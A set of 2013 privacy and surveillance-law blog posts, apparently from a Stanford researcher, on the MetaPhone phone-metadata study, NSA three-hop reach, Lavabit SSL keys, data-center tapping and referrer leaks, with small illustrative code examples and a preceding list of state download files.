Alaska: ZIP (118 MB)
Arizona: ZIP (218 MB)
Arkansas: ZIP (395 MB)
California: ZIP (1.14 GB)
Colorado: ZIP (328 MB)
Connecticut: ZIP (653 MB)
Delaware: ZIP (178 MB)
District of Columbia: ZIP (149 MB)
Florida: ZIP (849 MB)
Georgia: ZIP (428 MB)
Hawaii: ZIP (142 MB)
Idaho: ZIP (161 MB)
Illinois: ZIP (787 MB)
Indiana: ZIP (371 MB)
Iowa: ZIP (266 MB)
Kansas: ZIP (206 MB)
Kentucky: ZIP (230 MB)
Louisiana: ZIP (890 MB)
Maine: ZIP (111 MB)
Maryland: ZIP (390 MB)
Massachusetts: ZIP (421 MB)
Michigan: ZIP (366 MB)
Minnesota: ZIP (462 MB)
Mississippi: ZIP (287 MB)
Missouri: ZIP (523 MB)
Montana: ZIP (251 MB)
Nebraska: ZIP (218 MB)
Nevada: ZIP (133 MB)
New Hampshire: ZIP (138 MB)
New Jersey: ZIP (475 MB)
New Mexico: ZIP (190 MB)
New York: ZIP (2.40 GB)
North Carolina: ZIP (539 MB)
North Dakota: ZIP (125 MB)
Ohio: ZIP (880 MB)
Oklahoma: ZIP (435 MB)
Oregon: ZIP (358 MB)
Pennsylvania: ZIP (663 MB)
Rhode Island: ZIP (268 MB)
South Carolina: ZIP (192 MB)
South Dakota: ZIP (118 MB)
Tennessee: ZIP (406 MB)
Texas: ZIP (1.31 GB)
Utah: ZIP (194 MB)
Vermont: ZIP (103 MB)
Virginia: ZIP (254 MB)
Washington: ZIP (546 MB)
West Virginia: ZIP (196 MB)
Wisconsin: ZIP (334 MB)
Wyoming: ZIP (129 MB)

Please note, this is a personal project. It is not related to my coursework or research at Stanford University.

MetaPhone: The NSA’s Got Your Number

jonathan — Mon, 23 Dec 2013 15:47:14 +0000

Co-authored with Patrick Mutchler.

MetaPhone is a crowdsourced study of phone metadata. If you own an Android smartphone, please consider participating. In earlier posts, we reported how automated analysis of call and text activity can reveal private relationships, as well as how phone subscribers are closely interconnected.

“You have my telephone number connecting with your telephone number,” explained President Obama in a PBS interview. “[T]here are no names . . . in that database.”

Versions of this argument have appeared frequently in debates over the NSA’s domestic phone metadata program. The factual premise is that the NSA only compels disclosure of numbers, not names. One might conclude, then, that there isn’t much cause for privacy concern.

This line of reasoning has drawn sharp criticism. In a declaration for the ACLU, Ed Felten noted:

Although officials have insisted that the orders issued under the telephony metadata program do not compel the production of customers’ names, it would be trivial for the government to correlate many telephone numbers with subscriber names using publicly available sources. The government also has available to it a number of legal tools to compel service providers to produce their customer’s information, including their names.

When Judge Richard Leon granted a preliminary injunction against the program last week, he expressed a similar view:

The Government maintains that the metadata the NSA collects does not contain personal identifying information associated with each phone number, and in order to get that information the FBI must issue a national security letter (“NSL”) to the phone company. . . . Of course, NSLs do not require any judicial oversight . . . meaning they are hardly a check on potential abuses of the metadata collection. There is also nothing stopping the Government from skipping the NSL step altogether and using public databases or any of its other vast resources to match phone numbers with subscribers.

(Senator Dianne Feinstein issued a statement in response, reiterating that “no names” are coerced from the phone companies in bulk.)

So, just how easy is it to identify a phone number?

Trivial, we found. We randomly sampled 5,000 numbers from our crowdsourced MetaPhone dataset and queried the Yelp, Google Places, and Facebook directories. With little marginal effort and just those three sources—all free and public—we matched 1,356 (27.1%) of the numbers. Specifically, there were 378 hits (7.6%) on Yelp, 684 (13.7%) on Google Places, and 618 (12.3%) on Facebook.

What about if an organization were willing to put in some manpower? To conservatively approximate human analysis, we randomly sampled 100 numbers from our dataset, then ran Google searches on each. In under an hour, we were able to associate an individual or a business with 60 of the 100 numbers. When we added in our three initial sources, we were up to 73.

How about if money were no object? We don’t have the budget or credentials to access a premium data aggregator, so we ran our 100 numbers with Intelius, a cheap consumer-oriented service. 74 matched.¹ Between Intelius, Google search, and our three initial sources, we associated a name with 91 of the 100 numbers.

If a few academic researchers can get this far this quickly, it’s difficult to believe the NSA would have any trouble identifying the overwhelming majority of American phone numbers.

1. The results we obtained from Intelius were seemingly spottier than from Yelp, Google Places, and Facebook.

MetaPhone: The NSA Three-Hop

jonathan — Mon, 09 Dec 2013 17:03:13 +0000

Co-authored with Patrick Mutchler.

MetaPhone is a crowdsourced study of phone metadata. If you own an Android smartphone, please consider participating. In an earlier post, we reported how automated analysis of call and text activity can detect private relationships.

Does the National Security Agency have court authority to pore over your phone records? Quite possibly.

According to declassified documents, the NSA operates under a rote legal procedure for querying domestic phone metadata. The agency begins by identifying a “seed” number, with reasonable and articulable suspicion of terrorist activity.¹ Next, the NSA has discretion to follow up to three degrees of calling separation (“hops”).² The NSA is authorized to retrieve a complete set of phone records at each hop, and just one call in the past five years appears sufficient to make a hop.

Many observers have been deeply critical of this reach. By some estimates, a single seed number could establish authority to query phone records for thousands of Americans. Other estimates have counted into the millions.

A common approach for calculating these figures has been to simply assume an average number of call relationships per phone line (“degree”), then multiply out the number of hops. If a single phone number has average degree d, and the NSA can make h hops, then a single query gives expected access to about d^h complete sets of phone records.³,⁴

We turned to our crowdsourced MetaPhone dataset for an empirical measurement. Given our small, scattershot, and time-limited sample of phone activity, we expected our graph to be largely disconnected. After all, just one pair from our hundreds of participants had held a call.

Surprisingly, our call graph was connected. Over 90% of participants were related in a single graph component. And within that component, participants were closely linked: on average, over 10% of participants were just 2 hops away, and over 65% of participants were 4 or fewer hops away!

The reason, we found, is that the call graph does not solely resemble a diffuse social network. It also includes a hub-and-spoke structure, where many individuals are linked through well-known numbers.

The following figures illustrate this phenomenon with the MetaPhone call graph. Blue nodes reflect participants, red nodes indicate non-participant numbers, and gray edges connect call activity.

First, consider the graph of just the participants. Again, only one pair has held a call.

Now let’s add the most common non-participant number, which is for T-Mobile’s voicemail system.

Already 17.5% of participants are linked. That makes intuitive sense—many Americans use T-Mobile for mobile phone service, and many call into voicemail. Now think through the magnitude of the privacy impact: T-Mobile has over 45 million subscribers in the United States. That’s potentially tens of millions of Americans connected by just two phone hops, solely because of how their carrier happens to configure voicemail.

Let’s add additional frequent numbers.

Ever received a call from a Skype user?⁵ Authenticated your Google account by phone? You’re just two hops from everyone else in the same boat.

Note that phone spam is now in the mix. That’s especially troublesome for call graph connectivity, since the very purpose is to call as many numbers as possible. You’re just two hops from everyone else who’s been harassed about “cardmember services” or “your auto warranty.” (Hey, maybe the NSA should have competed in the FTC’s robocall challenge!)

You get the idea. Finally, here’s the entire call graph, omitting numbers called by just one participant.

So much for the notion that our crowdsourced call graph would be disconnected.

In thinking through the scope of NSA phone metadata authority, then, a simple d^h estimate does not tell the whole story. Calculations also have to account for the presence of high-degree hubs, which roughly map onto a power law.
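
A toy example shows the hub effect. The Python sketch below runs a breadth-first search over a tiny, invented call graph (the names and edges are hypothetical, not drawn from our dataset) and measures hop distance with and without a shared voicemail number.

```python
from collections import deque


def build_graph(edges):
    """Build an undirected adjacency map from (caller, callee) pairs."""
    graph = {}
    for a, b in edges:
        graph.setdefault(a, set()).add(b)
        graph.setdefault(b, set()).add(a)
    return graph


def hops(graph, start, goal):
    """Shortest number of hops between two numbers, or None if unconnected."""
    seen = {start}
    queue = deque([(start, 0)])
    while queue:
        node, dist = queue.popleft()
        if node == goal:
            return dist
        for neighbor in graph.get(node, ()):
            if neighbor not in seen:
                seen.add(neighbor)
                queue.append((neighbor, dist + 1))
    return None


# Hypothetical participants who each call only their own private contacts...
private_edges = [("alice", "mom"), ("bob", "dentist"), ("carol", "pizza")]
# ...plus one shared hub that all three happen to call.
hub_edges = [(person, "voicemail") for person in ("alice", "bob", "carol")]

without_hub = build_graph(private_edges)
with_hub = build_graph(private_edges + hub_edges)

print(hops(without_hub, "alice", "bob"))  # no path at all
print(hops(with_hub, "alice", "bob"))     # linked through the hub
```

With only private contacts the three participants are unreachable from one another. One shared number puts every pair two hops apart.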

What’s more, connections through high-degree hubs may be attenuated by a third hop. The discussion above focused on two-hop connections, where a hub merely links two numbers.

But a hub could also be one step removed from the seed.

Or one step removed from the user.

There is also the possibility of two hubs on a three-hop path from a seed to a user. Suppose, for example, that a suspicious number is phoned by a Skype user; a different Skype user has called FedEx; and you have phoned FedEx. You’re fair game.

The presence of hubs radically alters the connectivity of the phone graph. We resampled our data to estimate the reach of three hops, and consistently found that a majority of participant numbers would be included.⁶

So, what does all this mean for NSA watchers? The sample of MetaPhone participants is not representative of American phone use, and we do not know the properties of NSA seed numbers. We cannot, therefore, place statistically rigorous confidence bounds on our results. But our measurements are highly suggestive that many previous estimates of the NSA’s three-hop authority were conservative. Under current FISA Court orders, the NSA may be able to analyze the phone records of a sizable proportion of the United States population with just one seed number.

And by the way, there are tens of thousands of qualified seed numbers.

Many thanks to our advisors and colleagues for their invaluable input on this project. All views are solely our own.

1. For background, the reasonable and articulable suspicion standard is quite easy to satisfy: it’s the same basis for New York City’s controversial stop-and-frisk program. Also, between 2006 and 2009 the NSA failed to even meet the RAS standard for most of the seed numbers that it used.

2. We are not claiming that the NSA exercises this authority. We have no way of knowing, of course. FISA Court opinions indicate NSA technical staff may identify and ignore (“defeat”) high-degree numbers. But the opinions do not suggest the agency must do so. In fact, the FISC appears to view these efforts as an additional intrusion, since they involve analyzing the entire call database.

3. The NSA can also observe calls with a final hop number, such that d^(h+1) numbers might be affected (but not have full call records revealed) in a single query. This extended analysis appears to be the basis of a widely cited figure that, if an average person has 40 contacts, then three hops are sufficient to reach 2.5 million numbers.

4. More precisely, if node degree is fixed at d, then the number of nodes within h hops is d^h + d^(h-1) + . . . + 1 = (d^(h+1) - 1) / (d - 1).
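
The formulas in notes 3 and 4 are easy to check numerically. This Python sketch uses the 40-contact, three-hop figures from note 3; the function names are mine.

```python
def records_at_final_hop(d: int, h: int) -> int:
    """Numbers reached at exactly h hops when every node has degree d."""
    return d ** h


def nodes_within_hops(d: int, h: int) -> int:
    """Sum d^h + d^(h-1) + ... + 1, term by term."""
    return sum(d ** k for k in range(h + 1))


def nodes_within_hops_closed_form(d: int, h: int) -> int:
    """Closed form (d^(h+1) - 1) / (d - 1), valid for d > 1."""
    return (d ** (h + 1) - 1) // (d - 1)


d, h = 40, 3
print(records_at_final_hop(d, h))           # 64000
print(records_at_final_hop(d, h + 1))       # 2560000
print(nodes_within_hops(d, h))              # 65641
print(nodes_within_hops_closed_form(d, h))  # 65641
```

The 2.5 million figure corresponds to d^(h+1) = 40⁴ = 2,560,000.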

5. It appears that outbound Skype calls are, by default, placed from a small set of shared numbers.

6. Our call graph does not accurately reflect three-hop paths, since we do not have call records for the many non-participant numbers. We conducted a resampling analysis to account for this shortcoming, focusing on seed-spoke-hub-user paths. Over 10,000 iterations, we randomly selected a seed number from the participants. For high-degree neighbors, we simply followed two hops. For unknown neighbors, with probability .5, we randomly selected a new participant number and followed two hops over the high-degree neighbors.

MetaPhone: Seeing Someone?

jonathan — Wed, 27 Nov 2013 16:39:14 +0000

Co-authored with Patrick Mutchler.

Two weeks ago we kicked off the MetaPhone project, a crowdsourced study of phone metadata. Our aim is to inform policy and legal debates surrounding dragnet surveillance programs. We are exceedingly grateful to the hundreds of users who have joined. If you have not yet participated, you can still grab the MetaPhone app for Android.

Today we are excited to share some preliminary results: We can predict many romantic relationships. Automatically. Using solely phone metadata.

We began by dividing the problem into two parts. First, is a person in a relationship? If yes, then second, which number belongs to the person’s significant other?

The second problem, we quickly discovered, is much easier to solve. In our sample of individuals with significant others, the SO is the most-called number for over 60% of participants, and the most-texted number for over 70% of participants. Plenty of room for improvement, to be sure, but those simple features are a decent start.

Determining whether a user is in a relationship proved tricky. After some crash machine learning development, we were able to build a dating detector with good performance.

For those interested in the gory details: We began by selecting participants who provide a relationship status on Facebook. Individuals who were “Single” were labeled negative (no offense intended), and those who were “In a relationship,” “Engaged,” or “Married” were labeled positive. Next, we generated features from call and text patterns, including histograms of count and length. We used 10-fold cross-validation to generate training and testing splits and randomly upsampled training singles to account for participant imbalance. For each fold, we built a k-nearest neighbor classifier¹ from the training data and calculated a receiver operating characteristic curve over the testing data. Finally, we averaged the curves, as plotted below.

In less jargon: The graph reflects a tradeoff. We can get more individuals with significant others right, the vertical axis, in exchange for getting more singles wrong, the horizontal axis. This means, roughly, we can guess six in ten individuals with SOs right and get relatively few singles wrong. Or, if we accept getting one in three singles wrong, we can jump to getting over eight in ten individuals with SOs right.
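
For a concrete sense of how such a curve is traced, here is a dependency-free Python sketch. It is not our actual pipeline: the scores and labels are invented, with each score standing in for the share of a participant’s five nearest neighbors who are in a relationship.

```python
def roc_points(scores, labels):
    """Return (false positive rate, true positive rate) pairs, one per threshold.

    labels use 1 for "has a significant other" and 0 for "single".
    """
    positives = sum(labels)
    negatives = len(labels) - positives
    points = [(0.0, 0.0)]
    # Lowering the threshold flags more people as being in a relationship.
    for threshold in sorted(set(scores), reverse=True):
        flagged = [y for s, y in zip(scores, labels) if s >= threshold]
        true_pos = sum(flagged)
        false_pos = len(flagged) - true_pos
        points.append((false_pos / negatives, true_pos / positives))
    return points


# Hypothetical classifier scores and ground-truth labels.
scores = [1.0, 0.8, 0.8, 0.6, 0.4, 0.4, 0.2, 0.0]
labels = [1, 1, 0, 1, 1, 0, 0, 0]

for fpr, tpr in roc_points(scores, labels):
    print(f"singles wrong: {fpr:.2f}   SOs right: {tpr:.2f}")
```

Each printed row is one point on the curve: accepting more misclassified singles buys more correctly identified relationships.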

The relationship statuses that we studied are not, by the way, volunteered to the general public. Only about one in four were configured to display to a stranger on Facebook, even though that’s the default.

These are, to emphasize, preliminary results. We will have more, better, and higher confidence findings as additional users (like you!) participate. We still have much more work ahead on the MetaPhone project. This is just a first, promising step towards confirmation of metadata’s importance.

Many thanks to our colleagues at Stanford and Princeton for their invaluable suggestions. All views are solely our own.

1. We set the number of neighbors at 5, the default in sklearn’s implementation.

Saving Your Cryptographic Front Door

jonathan — Wed, 20 Nov 2013 18:00:21 +0000

Does the Fourth Amendment protect SSL keys? Not really, argues the executive branch in Lavabit’s appeal. “[A] business cannot prevent the execution of a search warrant by locking its front gate.”¹

True enough. But a business does have a constitutional right to keep that gate intact. When executing a warrant, officers must ordinarily announce themselves and afford an opportunity to open up.

This is not some quirk of jurisprudence. In Wilson v. Arkansas, the Supreme Court held unanimously that the “‘knock and announce’ principle forms a part of the reasonableness inquiry under the Fourth Amendment.” 514 U.S. 927, 939 (1995). That common law rule, the Court understood, traces its roots far back in the English legal tradition and “was woven quickly into the fabric of early American law.” Id. at 933.

Two years later, the Supreme Court held—again unanimously—that even felony drug busts can be subject to knock-and-announce. Richards v. Wisconsin, 520 U.S. 385 (1997). In the course of its opinion, the Court established the current constitutional standard for no-knock incursions.

In order to justify a “no-knock” entry, the police must have a reasonable suspicion that knocking and announcing their presence, under the particular circumstances, would be dangerous or futile, or that it would inhibit the effective investigation of the crime by, for example, allowing the destruction of evidence. Id. at 394.

If there’s a good reason, then, officers can break in. But, in general, “individuals should be provided the opportunity to comply with the law and to avoid the destruction of property occasioned by a forcible entry.” Id. at 393 n.5.

A cloud service should receive at least as much protection in its cryptographic front door. If not more—the service is an innocent bystander, compromised SSL keys are a devastating security breach, and the entire user population has interests at stake. When government officials lawfully demand user records, a cloud service should be given a reasonable opportunity to comply without forfeiting technical safeguards.

This position is informed as much by constitutional law as computer science. A cloud service usually can turn over user data without surrendering its front-end security.² SSL only protects information in transit; once data reaches the service, it is decrypted to plaintext. At that point, making a copy for law enforcement will usually be straightforward.³ Not trivial, necessarily, but hardly a feat of engineering.⁴ And the government would ordinarily compensate the cloud service for its efforts.⁵

The brief for the United States hints at willingness to accept this sort of constitutional compromise.⁶ “[I]n most cases, when government agents serve a provider with a pen/trap order, they are happy to let the provider use its own equipment and software to implement the order.” That includes keeping SSL keys secret.

Consider the implications of a more lenient rule. If a single mafioso uses Gmail, should that alone be sufficient to snag Google’s treasured SSL keys? Plainly not.

This middle-ground approach seems a pragmatic way for the courts to reconcile Internet security and law enforcement realities.⁷ It also suggests an outcome where Lavabit could lose—owing to its cavalier recalcitrance—but the Internet would still win substantial constitutional protections.

Disclaimer: I am not (yet!) a lawyer. None of the above should be construed as legal advice.

1. Specifically, the United States appears to view SSL keys as mundane business records that are merely incidental to a compelled disclosure. Lavabit, the Electronic Frontier Foundation, and the American Civil Liberties Union argue cloud service SSL keys can never be demanded owing to various statutory and constitutional barriers. This post argues for a constitutional intermediate position between those absolutes.

2. Lavabit eventually offered a solution like this, which the government criticized as too little, too late, and too costly. In practice, the middle-ground solution proposed here would be a matter for negotiation between a cloud service and law enforcement. Where an agreement cannot be quickly reached, given the sensitivities surrounding SSL keys, it would be reasonable for the judiciary to mediate. (Contrast the approach for no-knock searches, where officers alone apply for a no-knock warrant or make a determination in the field.) Requiring a warrant specifically for SSL keys, like the one issued in the Lavabit case, seems a sensible procedural safeguard.

3. My argument here is limited to services that already acquire the plaintext of user activity. If a company only has ciphertext (and no key), reengineering would be required to negate security measures. That is a much more questionable matter of law and policy. In the Communications Assistance for Law Enforcement Act (CALEA), for example, Congress expressly exempted services of the sort: “A telecommunications carrier shall not be responsible for decrypting, or ensuring the government’s ability to decrypt, any communication encrypted by a subscriber or customer, unless the encryption was provided by the carrier and the carrier possesses the information necessary to decrypt the communication.” 47 U.S.C. § 1002.

4. Out of curiosity, I took on the toy example of a realtime pen/trap for a web application using Apache over HTTPS. I assumed the target user had a unique cookie, and I used mod_setenvif and mod_log_config to write a custom log for the target user’s activity at a secret URL. It took less than half an hour.

5. In the Lavabit case, the government challenged the firm’s estimate of engineering cost. That argument only arose, however, after Lavabit had waited for weeks and appeared uncooperative to law enforcement.

6. If pressed, the United States would presumably frame this as a voluntary procedure and not a constitutional requirement. It would likely also contest the duration of delay, scope of judicial supervision, and substantive standard for compelled disclosure of SSL keys.

7. Lavabit’s appeal sloshes with incidental issues, including argument forfeiture and questionable conduct. It is therefore quite possible the Fourth Circuit will not even reach the merits.

What’s In Your Metadata?

jonathan — Wed, 13 Nov 2013 18:27:38 +0000

Original at Stanford CIS.

Co-authored with Patrick Mutchler. This is a project of the Stanford Security Lab.

We’re studying the National Security Agency, and we need your help.

The NSA has confirmed that it collects American phone records. Defenders of the program insist it has little privacy impact and is “not surveillance.”

Like many computer scientists, we strongly disagree. Phone metadata is inherently revealing. We want to rigorously prove it—for the public, for Congress, and for the courts.

That’s where you come in. We’re crowdsourcing the data for our study. We’ll measure how much of your Facebook information can be inferred from your phone records.

Participation takes just a few minutes. You’re eligible if you’re in the United States, use an Android smartphone, and have a Facebook account.

To get started, grab the MetaPhone app from Google Play.

Why Data Center Tapping is (Legally) Different

jonathan — Thu, 07 Nov 2013 19:45:38 +0000

Last week the Washington Post broke news that the National Security Agency has collected international traffic between Google and Yahoo data centers. I happened to be delivering a course lecture on signals intelligence the same day, so I made brief mention of the program—and how it appears particularly aggressive under the Fourth Amendment.

A sharp student pressed for specifics. How, he asked, could data center tapping be more legally questionable than previously leaked surveillance initiatives? This post is an expanded and refined version of my response.

In short: The firms evade Fourth Amendment pitfalls of citizenship, personal interest, and metadata. They also have enough evidence to establish standing. Finally, the NSA would have difficulty demonstrating that its surveillance was reasonable.

The parties to the communications are known to be United States corporations, which are entitled to Fourth Amendment protection against unreasonable searches.

Google and Yahoo are unambiguously protected by the Fourth Amendment. The Supreme Court has consistently held for over a century that American corporations have a constitutional right to privacy against government searches. Hale v. Henkel, 201 U.S. 43 (1906). And “every Court of Appeals to have considered the question” has held that “the Fourth Amendment applies to searches conducted by the United States Government against United States citizens abroad.” United States v. Verdugo-Urquidez, 494 U.S. 259, 283 n.9 (1990) (Brennan, J., dissenting). I am not aware of any authority suggesting that American corporations relinquish their Fourth Amendment rights merely by operating overseas, and I would be surprised to hear the executive branch argue as much.

The companies were not, to be sure, necessarily entitled to the full panoply of Fourth Amendment protections. Corporations generally have narrower privacy rights than individuals. United States v. Morton Salt Co., 338 U.S. 632 (1950). Both the Second and Seventh Circuits have held that extraterritorial searches are exempt from the Warrant Clause. In re Terrorist Bombings of U.S. Embassies in East Afr. (Fourth Amendment Challenges), 552 F.3d 157 (2d Cir. 2008); United States v. Stokes, 726 F.3d 880 (7th Cir. 2013). And the Foreign Intelligence Surveillance Court of Review has fashioned a foreign intelligence exception to the warrant requirement. In re Directives [Redacted] Pursuant to Section 105B of the Foreign Intelligence Surveillance Act [Yahoo Challenge], No. 08-01 (FISA Ct. Rev., Aug. 22, 2008). Even if all these caveats apply, however, the Fourth Amendment baseline remains: intercepts of Google and Yahoo data center traffic cannot be “unreasonable.”

Contrast all this with the PRISM and upstream surveillance programs, where at least one party to a communication is believed to be a foreign citizen outside the United States. No public court has adjudicated the constitutionality of that targeting; the Electronic Frontier Foundation’s litigation has been pending for seven years. Whatever one’s views of the merits, there are undeniably some arguments for sustaining the PRISM and upstream programs: The Supreme Court held in Verdugo that foreigners outside the nation’s borders are not covered by the Fourth Amendment, and Congress enacted the underlying surveillance authority in the FISA Amendments Act of 2008. Both the Foreign Intelligence Surveillance Court and the Foreign Intelligence Surveillance Court of Review have apparently found those arguments persuasive. Google and Yahoo skirt these issues, since they are American corporations.

Since Google and Yahoo were communicating with themselves, they maintained their Fourth Amendment interest.

Under current Supreme Court doctrine, Fourth Amendment rights are personal in nature. See, e.g., Rakas v. Illinois, 439 U.S. 128 (1978). Google and Yahoo can only assert a constitutional privacy claim if they retain a sufficient stake in electronic communications or records.

It would be challenging for the firms to establish enough personal interest in upstream surveillance. For example, imagine a foreign Gmail user sends an email to a foreign Yahoo mail user, and the NSA intercepts the message in transit. If Google or Yahoo were to claim a Fourth Amendment violation, the government would assuredly challenge their interests as too attenuated. Google had put the message out of its possession and Yahoo did not yet possess the message; the message was in a standard format that did not reflect proprietary information from either firm; and the message was transiting the public Internet.

Contesting the PRISM program would raise similar issues about insufficient privacy interests. When the government serves a FISA Amendments Act Section 702 order on a cloud service, it demands user data, not the service’s own data.

The companies might be able to raise Fourth Amendment claims on behalf of their users. In fact, the Foreign Intelligence Surveillance Court of Review allowed Yahoo to proceed with just such a challenge to PRISM. Yahoo Challenge. Claims of this sort, however, devolve into claims about communications involving non-U.S. persons. As noted above, that continues to be a constitutional gray area.

Google and Yahoo can avoid this entire morass by asserting their own constitutional privacy rights. When they sent messages between their own data centers, they never plausibly forfeited their Fourth Amendment interest and protection.

The argument is even stronger where the firms used dedicated lines. As a matter of longstanding Fourth Amendment doctrine, physical property rights (e.g. a residence or business complex) are generally sufficient to establish constitutional privacy rights. See, e.g., Dow Chemical Co. v. United States, 476 U.S. 227, 234-39 (1986). Google or Yahoo might be able to fashion data center intercepts as a trespass on their leased infrastructure, physical property in which they assuredly hold a Fourth Amendment interest.

Google and Yahoo sent themselves content, not metadata.

Some of the NSA’s surveillance programs rest on the legal theory that metadata is exempt from Fourth Amendment coverage. The argument generally goes that Smith v. Maryland, 442 U.S. 735 (1979), and its progeny render metadata outside constitutional guarantees; the counterargument generally goes that Smith applied to a specific defendant and technology, and is inconsistent with opinions in the more recent United States v. Jones, 132 S. Ct. 945 (2012). Orin Kerr and Jennifer Granick have written a particularly detailed exposition of this debate.

Google and Yahoo once again fall outside the familiar surveillance law tussle. They sent content (i.e. proprietary instructions and records) between their data centers, not just metadata.

What’s more, even if the firms had just sent metadata, United States v. Jones would provide a path forward. 132 S. Ct. 945 (2012). In that case, the Supreme Court sidestepped precedent that indicated public movements (much like metadata) are categorically exempt from the Fourth Amendment. Instead, the Court ruled that a Fourth Amendment search occurs where there is a trespass plus “an attempt to . . . obtain information.” 132 S. Ct. at 952 n.5. Google and Yahoo could cite intrusion on their leased lines as trespass, and the NSA was plainly seeking information.

Leaked materials provide a sufficient evidentiary basis for standing.

To challenge a government surveillance program,¹ a plaintiff has to establish that its communications have been intercepted, have been targeted, or are about to be targeted. Clapper v. Amnesty Int’l USA, 133 S. Ct. 1138 (2013). Foreign organizations and individuals would have difficulty meeting the threshold. For Google and Yahoo, the front page of the Washington Post should suffice.

Data center intercepts were objectively unreasonable.

Having cleared the various Fourth Amendment prerequisites, Google and Yahoo would finally have to establish that the NSA’s data center surveillance was unreasonable. I think they have a strong argument: Congress expressly fashioned a convenient, subpoena-like method for the NSA to obtain user data. It need only serve Google or Yahoo with an FAA 702 order. No judicial preclearance. No probable cause. And yet, the agency sidestepped this statutory authority and captured data center traffic. While the NSA may have had lawful access to the underlying user data (ambiguous), the agency also unnecessarily snagged associated Google and Yahoo data. The Fourth Amendment does not require the government to use the least intrusive means for executing a search. See Skinner v. Railway Labor Executives’ Ass’n, 489 U.S. 602, 629 n.9 (1989). But when a substantially less intrusive means is readily available, and that alternative has been crafted by Congress in near-total capitulation to agency requests,² an end run sure seems excessive.

Parting Thoughts

On Sunday, Eric Schmidt told the Wall Street Journal that NSA data center tapping was “outrageous” and that Google had complained to the executive and legislative branches. Maybe that’s the most response we’ll see; maybe Google and Yahoo will not invoke the judicial branch. Even so, from a legal perspective, the data center revelation is a game changer. First, we now know of an instance of unambiguously unconstitutional NSA conduct that apparently went undetected until media coverage. That’s yet another blow to claims of rigorous agency oversight. Second, we now know of an instance of unambiguously unconstitutional conduct under Executive Order 12333. Until recently, the focus of scrutiny was domestically conducted surveillance under FISA. Revelations about spying on data centers and foreign leaders have turned the spotlight towards EO 12333, the largely unregulated set of intelligence activities abroad. Effective intelligence reform efforts will necessarily have to go beyond FISA and address EO 12333.

Disclaimer: I am not (yet!) a lawyer. None of the above should be construed as legal advice.

1. Just because a plaintiff lacks standing, by the way, does not mean the plaintiff’s constitutional rights have been respected. I mention standing because, in the area of foreign intelligence surveillance, it is a particularly substantial obstacle to litigation.

2. As explained in a leaked NSA Inspector General report, FAA 702 was a direct response to NSA requests for new warrantless surveillance authority.

The Web Is Flat

jonathan — Wed, 30 Oct 2013 14:03:20 +0000

Consider this a bug report for the National Security Agency and its overseers. Dragnet online surveillance may be directed at international activity. But it nonetheless ensnares ordinary Americans as they browse domestic websites.

The spy outfit admits to vacuuming vast quantities of network traffic as it passes through the United States. Some taps are on the nation’s borders; others are on the domestic Internet backbone. International partner agencies, most prominently the UK’s Government Communications Headquarters, contribute to the NSA’s reach. Recent leaks have provided substantial detail: Under the Marina program, the agency appears to retain web browsing activity for a year.¹ The XKeyscore system offers at least one way for analysts at the NSA and cooperating services to efficiently query both historical and realtime data.

Agency apologists are quick to point out that the snooping has limits. The NSA only acquires online communications when a sender or recipient seems international. Doing otherwise might, in their view, violate congressional restrictions or constitutional protections.

Tough luck for foreigners. But if you’re within the United States, the notion goes, you don’t have much cause for concern.

That’s wrong. Americans routinely send personal data outside the country. They just might not know it.

Here’s an example: From approximately mid-August through mid-October, the House of Representatives website was not entirely “Made in the USA.” What you read was shared with a business in London.²

When you loaded a House webpage, your browser began by chatting up Akamai, a prolific and speedy web hosting service. Scant surprise there.³

As the page progressed, your browser was instructed to load some code provided by a company named Texthelp. The House’s aim was praiseworthy; Texthelp software assists individuals who have difficulty reading.

The House website in early October. A green arrow indicates the Texthelp feature.

Texthelp is, however, incorporated in and operated from the United Kingdom. When your browser schmoozed with the Brits, it passed along a “referrer”—a technical tipoff about the page that you’re reading.⁴

GET /Detect.ashx HTTP/1.1
Host: babm.texthelp.com
. . .
Origin: http://house.gov
. . .
Referer: http://house.gov/legislative/date/2013-10-4
. . .

So there’s the general problem. A person within the United States may be reading a webpage that looks, and is, as American as apple pie. But that webpage can pull in dozens of unexpected sources: advertising companies, analytics services, and social networks, among others. If just one of those third parties is international, your browsing activity could be swept into the NSA’s dragnet.⁵ ⁶
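To make the leak concrete, here is a minimal sketch that reads the request shown above and reports what the receiving server is told. The function name `describeReferrerLeak` and its return shape are my own illustrative assumptions, not anything from the House or Texthelp code. The cross-site check is also a simplification: it compares hostnames only, and does not try to work out registrable domains.

```javascript
// Hypothetical helper (not from the House or Texthelp code): read the header
// lines of a raw HTTP request and report which page URL the receiving host
// is told about via the Referer header.
function describeReferrerLeak(rawRequest) {
  const headers = {};
  for (const line of rawRequest.split(/\r?\n/)) {
    const colon = line.indexOf(":");
    // In this sample, the request line and the ". . ." elisions contain no
    // colon, so they are skipped.
    if (colon <= 0) continue;
    const name = line.slice(0, colon).trim().toLowerCase();
    headers[name] = line.slice(colon + 1).trim();
  }

  const receivingHost = headers["host"];
  const pageUrl = headers["referer"];
  if (!receivingHost || !pageUrl) return null; // nothing to report

  // Simplification: treat any hostname mismatch as cross-site.
  const pageHost = new URL(pageUrl).hostname;
  return { receivingHost, pageUrl, crossSite: pageHost !== receivingHost };
}

// The request from the example above, elisions included.
const sampleRequest = [
  "GET /Detect.ashx HTTP/1.1",
  "Host: babm.texthelp.com",
  ". . .",
  "Origin: http://house.gov",
  ". . .",
  "Referer: http://house.gov/legislative/date/2013-10-4",
  ". . .",
].join("\n");

const sampleLeak = describeReferrerLeak(sampleRequest);
console.log(sampleLeak);
```

The point of the sketch is simply that the third party does not need a cookie or a script of its own to learn the page address: the browser volunteers it in an ordinary header.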

I conducted a small experiment in late September to gauge the magnitude of the international referrer issue. Using FourthParty, a Web measurement platform we’ve built in the Stanford Security Lab, I tested 2,500 popular websites.⁷ The results were concerning, albeit unsurprising: international referrers are pervasive. I spotted the phenomenon on pages across many categories of popular websites, including political commentary (examples: National Review and Talking Points Memo), popular culture (Buzzfeed and Parade), sports (Major League Baseball and the PGA Tour), travel (Lonely Planet), consumer products (Nike), retail (Overstock), and personal health (Medicare.gov). Yes, even the apple pie recipe on CHOW has a Canadian component. So much for a bright line dividing the domestic and international Web.

This technical result raises serious legal questions. Has Congress authorized wholesale surveillance of apparently domestic online activity? Does the Fourth Amendment tolerate rampant prying into our homeland web browsing?

